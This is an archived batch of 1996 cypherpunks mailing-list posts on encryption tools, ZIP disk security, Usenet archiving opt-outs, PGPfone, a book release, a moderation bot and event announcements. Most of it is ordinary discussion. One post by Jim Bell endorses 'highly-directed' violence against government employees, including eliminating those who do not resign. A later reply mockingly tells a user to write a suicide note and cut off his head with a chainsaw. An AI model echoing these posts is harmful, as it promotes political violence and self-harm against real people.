: 

- -- 
      Mark Rogaski <wendigo@gti.net>           100,000 Lemmings
   GTI GlobalNet System Administrator		Can't Be Wrong!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVMsog0HmAyu61cJAQHGGAQAxa1n7zXlD49TH7SlQTRGlRdEp2QGmvTt
Vcdp/9VrbXqNIhSHQC5yxT7rc7SDOS2mvyFx9kz4rraiBOEMt5wZpGHkExpXMFHS
T8mrHHrONEUjLDiiGZSLWtCPTjd0OZ4Qp/251OJxT8kZ9P/Sdmx3NueG6dlMFMpm
m5qz167wK3M=
=0+8d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sonicpty@sirius.com (Sonic Purity)
Date: Sat, 23 Mar 1996 16:07:27 +0800
Subject: Re: CD-reading for random keys
In-Reply-To: <4i5gtu$99i@news2.realtime.net>
Message-ID: <sonicpty-2203961826450001@ppp108-sf2.sirius.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4i91h4$lp5@nero.omega.co.nz>, bruce@omega.co.nz wrote:

>>Doe anyone know where sample code exists to enable one to read the digital
>>stream from an audio CD? <edit>
>>crypto system.  You merely start reading at a specific spot, tossing away
>>bytes using a reproducable random number generator, then permuting
>>those to form a XOR one time key of any length you want.
>
>The "entropy" or randomness of audio data is LOW. That's why audio compresses
>so well. However, the idea of keeping a one-time key on CD-ROM is good.

   CD-ROM--good. CD-Audio--weeeelll...could be trouble. Keep in mind Red
Book audio does not require 100% error correction, so it would be pretty
likely the keys would not match given the tiniest data hiccup. A data mode
should work (i'd think).

<edit>Then you can send up to 600M of totally secure data before you
>dispose of the disks (Microwave oven is fun :) and write a new pair.

   3-4 sec. on High; no more, no less. Remove the oven bulb beforehand for
best viewing:)

))Sonic((
over 1192 CD players served, but who's counting?

-- 
All spelling & grammar errors (c)1996 Sonic Purity.

§ Now available in two tasty flavors: new (sonicpty@sirius.com) and original (sonicpure@aol.com) §
                         @@
Demopublicans are dead, @  @    Support free speech online
      ribbons are blue: @  @    (and everywhere else too)
                         @@
                        @  @
                       @    @
                      @      @




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 23 Mar 1996 10:39:28 +0800
To: "Joseph L. Moll" <jmoll@acquion.com>
Subject: Re: protection on IoMega ZIP drives
In-Reply-To: <2.2.32.19960322120637.006acd68@mail.acquion.com>
Message-ID: <31533A8F.3A9E@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


For the PC you might be able to hack SecureDrive to handle SyQuest
and ZIP drives.  I recall R.Brown's interrupt lists showed that the
drivers set up different subfunctions for Int 13h (low-level disk ops).

It's only speculation though. Has anyone done this?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 22 Mar 1996 22:15:54 +0800
To: cypherpunks@toad.com
Subject: BOAF Sat April 6, Melbourne
Message-ID: <199603220751.SAA00159@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



		 ____        _                _     _
		/ ___| _   _| |__  _   _ _ __| |__ (_) __ _
		\___ \| | | | '_ \| | | | '__| '_ \| |/ _` |
		 ___) | |_| | |_) | |_| | |  | |_) | | (_| |
		|____/ \__,_|_.__/ \__,_|_|  |_.__/|_|\__,_|
-------------------------------------------------------------------------------
			       Birds of a feather
			 ____            _         _ 
			|  _ \ __ _ _ __| |_ _   _| |
			| |_) / _` | '__| __| | | | |
			|  __/ (_| | |  | |_| |_| |_|
			|_|   \__,_|_|   \__|\__, (_)
					     |___/   

		    Saturday April 6, 1996 (easter weekend)
			    8:30pm till day light
			      boaf@suburbia.net
			     Melbourne Australia
	        (http://www.lonelyplanet.com/dest/aust/melb.htm)

Q: who's invited? 
A: you

Q: who will be there?
A: a cross-social strata of individuals, occupations and ages. It will
   be an eclectic evening.

Q: no, I mean who will *really* be there?
A: now is not the time for potentially dichotomatic simplifications of
   character, but what the heck...

(a) Suburbia users:

	From magistrates and politicians to convicted computer hackers.
	We have as users private investigators, writers, programmers,
	QC's, record producers, musicians, film directors, journalists,
	policemen, intelligence agents, chess champions, members of
	obscure religious sects, netball umpires, many, many types of
	scientists and engineers, security experts, doctors,
	accountants, bartenders, choral conductors, comedians, nurses,
	DJ's, military police, drivers license testing officers,
	farmers, haematologists, herbalists, unionists, lecturers,
	librarians, linguists, paramedics, basketball umpires, air force
	pilots, singers, surgeons, system operators, linesmen, TV
	service men, solicitors, taxi drivers, teachers, unemployed
	inventors, veterinarians, actresses, aerobics instructors, art
	directors, athletes, chefs, bank clerks, cleaners, prison
	officers, dentists, dishwashers, film marketers, housewives,
	locksmiths, pensioners, radiologists and waiters (to name a few)

(b) members of the following Suburbia run mailing lists:

	Avenue
		St. Etienne (a musical group) fans. 
	BoS (best-of-security digest)
		Paranoid system admins, computer hackers,
		security professionals and a whole bunch of spooks
	Inside-Source (inside-source)
		As above, but don't introduce these guys to your sister.
	LACC (Legal Aspects of Computer Crime)
		Lawyers, security professionals, police, hackers,
		certifyably paranoid system admins and political
		activists

(c) 	Memebers of the:

	Powerline Action Group
	Alternative Technology Association
	Center for Comtempory Photography
	Ross House Association
	Australian Public Access Network Association
	Private Inquiry Agents Association

(d)     Selected people and organisations that we owe favors to, and who
        shall remain anonymous.

(e)	Fans of T. Capody, P.K Dick, Stanislaw Lem, Pushkin, Nabakov,
	Dostoevesky or Thomas Pynchon.

Venue: 

	A computationally secure address in North Melbourne,
	approximately 10 minutes drive from the city center and 5
	minutes walk from the North Melbourne railway station.

	There will be around 15 Internet ISDN connected PC's and a
	pro-tem dedicated link to Suburbia. Though, we encourage you
	to forget all about life as a keyboard interface for the night.

	Main course meals will be available for around $10 a head.
	Drinks will be served till 1am.

	Email boaf@suburbia.net for the ADDRESS and DIRECTIONS on how to
	get to it. You will need to include the number of people you
	plan bringing and how many of those (including yourself) desire
	to digest something other than the fascinating conversation. Do
	not request the address unless you definitely plan on coming, or
	our calculations and your reputation will go down like a V1.

	There is NO door fee, but small donations of dollars
	and/or computer/radio/microwave hardware/cables are encouraged
	(or you might get a few funny looks) to help cover costs.

Music:
	BYO and we will play it provided it is something people can
	background if they want to talk. Most techno, hard-rock and
	pop will end up as a North Melbourne UFO sighting before it gets
	anywhere near the audio equipment. R&B, Jazz fusion, and Syd
	Barret (early Pink Floyd) style/derived material will be looked
	upon a good deal more favorably, but some of us are open minded.

Dress:
	Anything that doesn't get you an indecent exposure charge will
	get you in the door. 1930's incognito is just fine.
	
	ps. the undercover colour of the day is purple.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Sat, 23 Mar 1996 19:14:28 +0800
To: "Joseph L. Moll" <jmoll@acquion.com>
Subject: Re: protection on IoMega ZIP drives
In-Reply-To: <2.2.32.19960322120637.006acd68@mail.acquion.com>
Message-ID: <Pine.SUN.3.91.960322192448.9437A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Mar 1996, Joseph L. Moll wrote:

> This is in regard to the now popular ZIP disks, the removable 100MB
> cartridge for PC's/MAC's.
> 
> Anyone have any idea how secure the ZIP disk is once it is "protected?"  I
> know that the disk will refuse to be mounted without the passkey, but what
> is really happening here?

Not much.

Use CryptDisk, shareware from Mr. W. Price.

I believe the current version is 1.1.3
Much more secure.

> 
> 
> Best Regards,
> ---
> Joseph (Joe) L. Moll  mailto:jmoll@acquion.com
> Network/Communications Engineering
> http://www.acquion.com  phone:864-281-4108  fax:864-281-4576
> Acquion, Inc.  Greenville, SC  USA -- Specialists in Electronic Commerce
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Mar 1996 15:22:07 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Ecash API about to be released
Message-ID: <m0u0Jzf-0008xCC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:49 PM 3/22/96 -0500, t byfield wrote:
>9:34 AM 3/22/96, jim bell:
>
>> For obvious reasons, I am interested in ecash with full payee, as well as
>> payer, anonymity.  Last I heard, Digicash didn't provide this.  Any updates?
>
>        Finally setting up shop, eh?

No, just keeping the pot boiling.



> I can see your shingle already:
>
>                   ------------------------------------
>                  |                                    |
>                  |   JIM "Yeah, THOSE Daltons" BELL   |
>                  |                                    |
>                  |   Anonymous Assassination Broker   |
>                  |                                    |
>                  |            "redefining             |
>                  |           random violence          |
>                  |             since 1996"            |
>                   ------------------------------------

One reason I can say with a good degree of confidence that I've already won 
the debate is that my opponents are stuck with fielding silly "feel-good" 
one-liners such as the one you've crafted above.  Nothing I've said 
indicates that I'm in favor of "random violence":  the kind I would 
_enthusiastically_ facilitate is a highly-directed form of violence, in the 
direction of people who have historically maintained a high degree of 
implied and potential violence in this society for decades.  That's right, 
government employees.  You know, the ones who can attack you (as they did 
Rodney King), illegally search your house (as they did OJ Simpson), shoot up 
and eventually burn your residence (a la Waco) and kill innocent people in a 
standoff (Ruby Ridge.)  Oh, yes, I can't forget Donald Scott's fate, to be 
killed in a hail of police bullets fired during a search obtained with 
perjured testimony.

Not to mention the collection of well over a trillion dollars in individual 
and corporate income taxes, none of which could be collected without the 
ultimate threat of violence against those who resist.

Naturally, the closet (and not-so-closet) statists see nothing wrong with 
this kind of government-authorized violence, and therefore they would object 
to any attempt to prevent it as I am doing.

The only way you will ever be able to effectively challenge my opinions is 
if you're forced to deal with reality:  This society is already saturated 
with violence and the threat of violence, and the only way to stop it is to 
disable those who maintain that violence.  The best way is to force them to 
resign, or eliminate them if they do not.

Care to try again with a more credible argument?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 23 Mar 1996 22:07:44 +0800
To: cypherpunks@toad.com
Subject: Excluding articles from DejaNews
Message-ID: <Pine.3.03.9603222011.A5800-a100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I just noticed this in their FAQ, dated February 20th:

     Q: I don't want my Usenet articles to appear in Deja News. What do I do?
     A: We have implemented a feature whereby if your article contains an
        X-Header looking like 

                   X-No-Archive: Yes

     your article will be excluded from our database forever. 

Anyone know if other search engines support this? I think such a standard
would be a Good Thing. Of course there will be the odd private archive,
and of course some nastyfolks might grep Usenet just for X-No-Archive
headers, but this is a good step for casual alt.support - type privacy. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sat, 23 Mar 1996 18:48:39 +0800
To: jis@mit.edu
Subject: Re: New Beta Test of PGPfone available WINDOWS '95 Included!
Message-ID: <199603222109.QAA22574@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


jis@mit.edu (Jeffrey I. Schiller) writes:

>We have finally released a Windows '95 version of PGPfone. This release
>includes PGPfone for Macintosh version 1.0b6 and PGPfone for Windows '95
>version 1.0b1. Note: The Macintosh version does not talk to earlier versions.
>However the Macintosh and Windows version talk to each other!

>Connections can be either via modem or the Internet.
[..]

Will there ever be a Win32s version of PGPfone?  I have one of those systems
with non-(MS)DOS partitions that MS-DOS/Wind95 doesn't like, so until MS can
deal with the fact that people use other OSs, I'm staying clean of Win95.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 23 Mar 1996 22:15:07 +0800
To: cypherpunks@toad.com
Subject: http://anarchy-online.dementia.org/book/
Message-ID: <Pine.SUN.3.91.960322210713.13941F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


[I'm not associated with this book except that I helped HTMLize it.
-Declan]



                    For Immediate Release 
 
-------------------------------------------------------------
 
         A New Book Investigating Sex on the Internet 
        is Pre-Published, Free, via the World Wide Web 
 
-------------------------------------------------------------
 
While the fate of online freedoms is being determined by 
federal judges in Philadelphia, a contributing writer to 
Wired magazine has decided to give away his investigative 
book on the subject. 
 
Charles Platt spent six months gathering data about netporn 
for a book to be published later this year by HarperCollins. 
 
According to Platt, "My publishers hoped to rush the book 
into print. When their plans changed as a result of factors 
outside my control, I decided the material was so topical and 
so important, it should be placed freely on web sites." 
 
Titled ANARCHY ONLINE, the book is divided into two parts. 
The first deals with net crimes such as hacking, viruses, and 
data piracy. Platt includes first-hand descriptions of 
hackers and pirates and debunks myths created by melodramatic 
press coverage. 
 
Part Two of the book explores free speech online and examines 
netporn more frankly and in greater depth than has been 
achieved elsewhere. Platt concludes that although a genuine 
problem does exist, a "war on porn" will be as unwinnable, 
expensive, and divisive as the "war on drugs." 
 
Part Two of the book contains about 65,000 words and is being 
placed online in its entirety. It includes transcripts from 
pornographic IRC chat sessions and sexually oriented Usenet 
news groups; a look at pedophilia on America Online; a new, 
damning investigation of Martin Rimm (whose porn study was 
immortalized in Time magazine); and a reassessment of issues 
raised by Jake Baker (who faced years in jail after he placed 
sadistic stories on Usenet). Platt also examines federal 
attempts to control encryption; the Guardian Angels; 
anonymous remailers; repressive laws at the state level; 
content-filtering software; and content rating schemes. There 
are exclusive interviews with Scott Charney at the Department 
of Justice, Ann Beeson of ACLU, Louis Rossetto and Kevin 
Kelly of Wired magazine, anti-child-porn crusader Barry 
Crimmins, David Chaum of DigiCash, and Phil Zimmermann, 
creator of PGP. Many other industry figures and commentators 
make cameo appearances. 
 
Platt concludes that net fears have been exaggerated and 
demands for censorship are unwarranted. "Most people who want 
to censor the net don't use it and are willfully ignorant of 
it. They tend to be religious extremists and opportunistic 
legislators looking for a hot-button issue. I question their 
right to inflict laws on a community that they don't live in 
and know nothing about." 
 
Platt feels that if widely available methods are used to 
control access by children, the net can be safer than a day-
care center. "My daughter started net surfing when she was 
15. Even if children have totally unrestricted access, the 
net is still more benign than most real-world environments. I 
believe this is thoroughly substantiated by my book." 
 
ANARCHY ONLINE is freely available at 
http://anarchy-online.dementia.org/book/ 
 
Charles Platt is the author of 40 books, ranging from 
computer guides to science fiction. His novel PROTEKTOR was 
published this year by Avon Books. He is a contributing 
writer to Wired magazine and has an article on net censorship 
in the current issue, dated April. 
 
Platt can be contacted at (212) 929 3983 or via email at 
cp@panix.com. 
 
-------------------------------------------------------------
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 23 Mar 1996 14:17:37 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Conference of Interest
Message-ID: <Pine.SUN.3.91.960322212355.13388A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Interested Cypherpunks might wish to review the following:

The U.S. Russia Business Council
presents its
Fourth Annual U.S.-Russian Trade and Investment
Forecast '96

While at first glance not crypto related, in past this conference has 
brought together a fascinating combination of spooks, private sector 
types, TLA's and academics.  The amount of access to otherwise secretive 
and shadowy officials and "big name" types is significant.  I have found 
in past that everyone at the conference is fairly approachable.  The 
networking and back room, off topic discussions are so numerous that in some 
ways the title of the conference is a misnomer.

Though the fees are hefty, I encourage c'punks who will be in the area to 
consider attending.  Additional information is available at (202) 739-9180.


The U.S. Russia Business Council
presents its
Fourth Annual U.S.-Russian Trade and Investment
Forecast '96
on
Monday, April 1, 1996
at
The Four Seasons Hotel
Corcoran Ballroom
2800 Pennsylvania Avenue, NW
Washington, DC  20006

Preliminary Agenda

8:00-9:00 am  Registration

9:00-9:15 am  Welcoming Remarks - Eugene K. Lawson, President, 
U.S.-Russia Business Council
Introductory Remarks - Ambassador Robert S. Strauss
Chairman, U.S.-Russia Business Council

9:15-9:45 am  The Honorable Anthony Lake
Assistant to the President for National Security Affairs

9:45-10:15 am  H.E. Yuli Vorontsov
Ambassador of the Russian Federation

10:15-10:30 am  Break

10:30-11:00 am  The Honorable Jan Kalicki
Counselor to the Department of Commerce and U.S. Ombudsman for Energy and 
Commercial Affairs to the NIS

11:00-11:30 am  Eugene K. Lawson - Financing Update 1996

11:30-12:00 am  The Honorable John M. Deutch
Director of Central Intelligence

12:00-12:30 pm  Reception

12:30-2:00 pm  Luncheon
Luncheon Speaker - The Honorable Michel Camdessus
Managing Director of the International Monetary Fund

2:00-2:30 pm  The Honorable Lawrence H. Summers
Deputy Secretary of the Treasury

2:30-3:30 pm  Panel Discussion - "View from the Trenches"

3:30-5:00 pm  Panel Discussion - "Russian Presidental Election and Beyond"

5:00-6:00 pm  Cocktail Reception


---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 23 Mar 1996 13:42:13 +0800
To: cypherpunks@toad.com
Subject: Please criticize PGP-based robomoderator
Message-ID: <199603230338.VAA10601@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Date: Fri Mar 22 21:25:47 CST 1996
To: cypherpunks@toad.com
Subject: Please criticize PGP-based robomoderator

Hello,

Today UVV's announced that a new group, soc.culture.russian.moderated,
was voted into existence. If all goes well, it should be newgrouped
soon. 

For this group, I wrote a robomoderator program that does the following: 

	1) Enforces posting style required by the charter
	2) Checks PGP signatures on incoming messages and prevents some
	   types of forgeries
	3) Implement secure (PGP-based) exchange between robomoderator
	   program and human moderators, for messages requiring their
	   approval
	4) Black lists, white lists, and lists of suspicious words 
	   (Cypherpunks may imagine that ``medusa'' would be a suspicious
	   word for this list)
	5) Signs (with Greg Rose's PMApp) approved articles to prevent
	   posting articles with forged approval
	6) supports appeals, moderators' mailing list, and more.

A specification for the robomoderator is on my home page at 

      http://www.algebra.com/~ichudov/usenet/scrm/robomod/robomod.html

and your criticisms and suggestions are more than welcome.

For security reasons, we cannot post the code yet. We'll do it after 
I systematically proofread it to make sure that it is secure.

Robomoderator is written in perl and sh, with some C code. It is working,
but there are sopme minor things to do (they are listed in the TODO list
on my WWW Page).

Thanks to Dr. Dimitri Vulis for several good suggestions that I implemented.

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVNx8sJFmFyXKPzRAQEgVwP+Il58rOpbWtlC0MW4tPrYEnuF9JC5OJET
VhaWud9lYzMDo9sdiBBmmgPqs5n3/lPpvxuNX4oCNbooP/U7SE8iqqOlcEdRDI3d
KCSS8jol+T+VQGyVg8GkNrjSzSrfBrnka/CYMCXzKPGCFKcj5QiO1ufuBlhcxNsa
glTt8xf5BrY=
=xUgQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 23 Mar 1996 16:04:33 +0800
To: cypherpunks@toad.com
Subject: Re: New Encryption Software-Encrypt Image & Text Files (fwd)
Message-ID: <960322224449_253590813@mail06>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone suggested that these folks at Antelope do a merger with IPG?
 Inquiries can be forwarded to matchmakers@snake-oil.org...

Jonathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 23 Mar 1996 23:00:26 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: Excluding articles from DejaNews
In-Reply-To: <ad78d3bd0002100435ea@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960322222226.11848A-100000@elaine47.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Mar 1996, Timothy C. May wrote:

> At 4:38 AM 3/23/96, Rich Graves wrote:
> >                   X-No-Archive: Yes
> >
> >Anyone know if other search engines support this? I think such a standard
> >would be a Good Thing. Of course there will be the odd private archive,
> >and of course some nastyfolks might grep Usenet just for X-No-Archive
> >headers, but this is a good step for casual alt.support - type privacy.
> 
> Even facetiously, count me as one of the "nastyfolks." If someone has made
> comments to the entire Usenet, any search engine which purports to index
> articles on the Usenet and does not index _all_ articles is misleading its
> customers.

AltaVista doesn't index web sites that follow the Robots Exclusion
Standard. Does that mean you won't use AltaVista anymore, either? 

Interesting and correct opinion, but they're not saying they index _all_
of Usenet. They're saying, "We archive Usenet." "Well, what about
excluded articles?" "Oh, we don't archive _those_ articles, of course," 
they say. The proposed exclusion standard is posted publicly. Ain't 
their fault that I didn't read that part of the FAQ until just now.

Agreed, anyone really concerned about their privacy should be using
anonymity/pseudonymity, but a temporary hidey-hole is a Good Thing. 
But I can think of a lot of reasons you might want to post something
under your real name, or your regular pseudonym -- gaining the benefit of
your good (or bad) reputation, mostly -- but on the other hand, you don't
want that post archived. It's called an "aside." 

For example, I might want to say, "Tim May is a big fat idiot because of
what he just said." I do want to say that, publicly, under my name and
address, but for various reasons, I don't want that saved in the
archives. Since X-Headers are readable by most newsreaders, and are in
fact shown by default in at least the default install of trn, I don't
think I'm doing anything particularly "sneaky." If you (or someone else)
wants to make sure that I am on record saying, "Tim May is a big fat
idiot," then you'd post a followup, perhaps pointing out that I'd tried
to be sneaky by using an X-No-Archive header. 

X-No-Archive is like preceding your remarks with "Off the record..."
People and bots can heed, ignore, or flaunt that disclaimer at their 
option. 

OK, you've convinced me that this isn't a privacy thing, really, but I
think is a valid and useful thing. What's the alternative, really? If I
want to say something, now, are you going to tell me that I don't have
the right to request that you not take my comments on the record? That
sounds sort of totalitarian. I either have to create a new, unique nym on
the fly, in which case my comments lose anything associated with my name,
or I have to keep my comments to myself. Recognizing "Well, the full
context is recorded too, you can defend youself with that" only makes it
worse, really. 

Just thinking out loud, my thoughs being recorded for posterity on
hks.net and Exon-knows where else... 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 23 Mar 1996 16:06:59 +0800
To: cypherpunks@toad.com
Subject: Re: Excluding articles from DejaNews
Message-ID: <ad78d3bd0002100435ea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:38 AM 3/23/96, Rich Graves wrote:
>I just noticed this in their FAQ, dated February 20th:
>
>     Q: I don't want my Usenet articles to appear in Deja News. What do I do?
>     A: We have implemented a feature whereby if your article contains an
>        X-Header looking like
>
>                   X-No-Archive: Yes
>
>     your article will be excluded from our database forever.
>
>Anyone know if other search engines support this? I think such a standard
>would be a Good Thing. Of course there will be the odd private archive,
>and of course some nastyfolks might grep Usenet just for X-No-Archive
>headers, but this is a good step for casual alt.support - type privacy.

Even facetiously, count me as one of the "nastyfolks." If someone has made
comments to the entire Usenet, any search engine which purports to index
articles on the Usenet and does not index _all_ articles is misleading its
customers.

(Being a market sort of person, I'll let market forces work. I don't user
DejaNews at this time, and now don't expect to. My preferred search engine,
Alta Vista, catches even posts marked "X-No-Archive: Yes", which I count as
A Good Thing.)

I don't think the security-through-obscurity approach is a good thing. It
is the security that ostriches have.

If folks don't want their words haunting them, they should either say
nothing or use anonymizing services.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Sat, 23 Mar 1996 22:07:53 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship
Message-ID: <199603230448.XAA07822@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com wrote:

William B. F--- er, F. Buckley? The "libertarian" who supports
blue laws and prayer in schools wanting to censor the internet?
Nahhhhh...

(And maybe it's not rational, but anyone with a name like
"Arianna Huffington" is not worth taking seriously outside a
room full of hundred- and fifty year old WASPs burning Beatles
albums and copies of Origin of Species.)



[...Sniperoo!...]
_Firing Line_ debate
Resolved: The Government Has the Right to Regulate the Internet
"A current communications controversy fuels the proposed resolution in the
latest installment of William F. Buckley Jr.'s recurring series, in which
participants debate whether the Internet should be federally regulated.
Among those arguing for it with Buckley are Arianna Huffington and Reid
Hoffman; those against it include Susan Estrich and John Perry Barlow."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sat, 23 Mar 1996 15:27:50 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Free speech debate on MSN Encarta
Message-ID: <v0213051fad7930c47107@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 PM 3/21/96, Raph Levien wrote:
>So here's a random idea: have an ISP that essentially firewalls the
>Internet connection to the house, so that it is very difficult to get
>unwanted stuff over the wire at all. The ISP can maintain and update the
>latest high-tech tools, including filtering by URL, filtering by
>keyword, and other stuff like detecting proxies. While they're at it,
>they can filter out junk email.

This is easily done from a technical standpoint.  There is a set of patches
for the CERN server that lets you have it automatically delete
advertisments from certain prominent sites (used to be called NoShit, I
heard they changed the name) when you're running in proxy mode.  You can
even have it change profanity into "EXON EXON" on the fly.  Running
something like this is probably a good thing for the ISP as running a cache
will allow them to get more mileage out of their net connection.

However, I don't think it likely that many ISPs will go this route from a
liability point of view - if some parent is paying them to filter out smut,
and little Zippy finds a brand new x-rated site, chances are some irate
parent will sue them.  With the proliferation of new pages, it is
impossible for anyone to keep up, unless the authors voluntarily include
some smutscan codes in their pages.

>Raph (whose son, Alan Mathison, was born Sunday morning at 5:01 am)

Congrats.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Mar 1996 17:25:41 +0800
To: Rick Smith <cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603230800.AAA24157@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:11 PM 3/22/96 -0600, Rick Smith wrote:
>The big deal is that few vendors have tried to get NCSC evaluations.

We walked KeyKOS a long way down the path to a B2 rating.  Our investors
refused to fund the estimated $1 million it would cost to do all the
paperwork.  They felt there was no market for NCSC secure systems.  Perhaps
others felt the same way.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sat, 23 Mar 1996 15:36:13 +0800
To: "Joseph L. Moll" <jmoll@acquion.com>
Subject: Re: protection on IoMega ZIP drives
Message-ID: <v02130521ad79360faf4e@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


re:
>This is in regard to the now popular ZIP disks, the removable 100MB
>cartridge for PC's/MAC's.
>
>Anyone have any idea how secure the ZIP disk is once it is "protected?"  I
>know that the disk will refuse to be mounted without the passkey, but what
>is really happening here?

In my experience (on a Mac) the Zip doesn't get any slower once protected
so I expect it is probably some mickeymouse bit that gets set somewhere,
and the Iomega driver simply refuses to mount the disk.  I don't think
Linux would even blink before mounting the purportedly "protected" volume.

If you're concerned about securing your carts, I recommend creating a
CryptDisk file on the Mac disk.  I don't use DOS/Windows, so I can't
suggest anything for that, but I'm sure someone else on the list will jump
in.  Matt Blaze recently posted an announcement of a new release of his
secure filesystem for unix to the list, which I believe also runs under
Linux.


Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sat, 23 Mar 1996 15:39:24 +0800
To: weinberg@accessus.net (WThinker)
Subject: Re: LET'S ROCK!!!!
Message-ID: <v02130522ad79382c2e73@[192.168.69.70]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM 3/22/96, WThinker wrote:
>Ok, here is the situation.  I have a person mad at me in one of my mailing
>lists.  Turns out, this person was the owner of the mailing list!  Well now
>I'm stuck, knocked out of the list.  The owner can not see any of my mail,
>no matter how hard I try.  I need some ideas to eather get through to her,
>or really fuck up the mailing list.
>
>Any ideas?

Learn to spell, write a really poignant suicide note, and then cut off your
head with a chainsaw.

That'll make her sorry.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






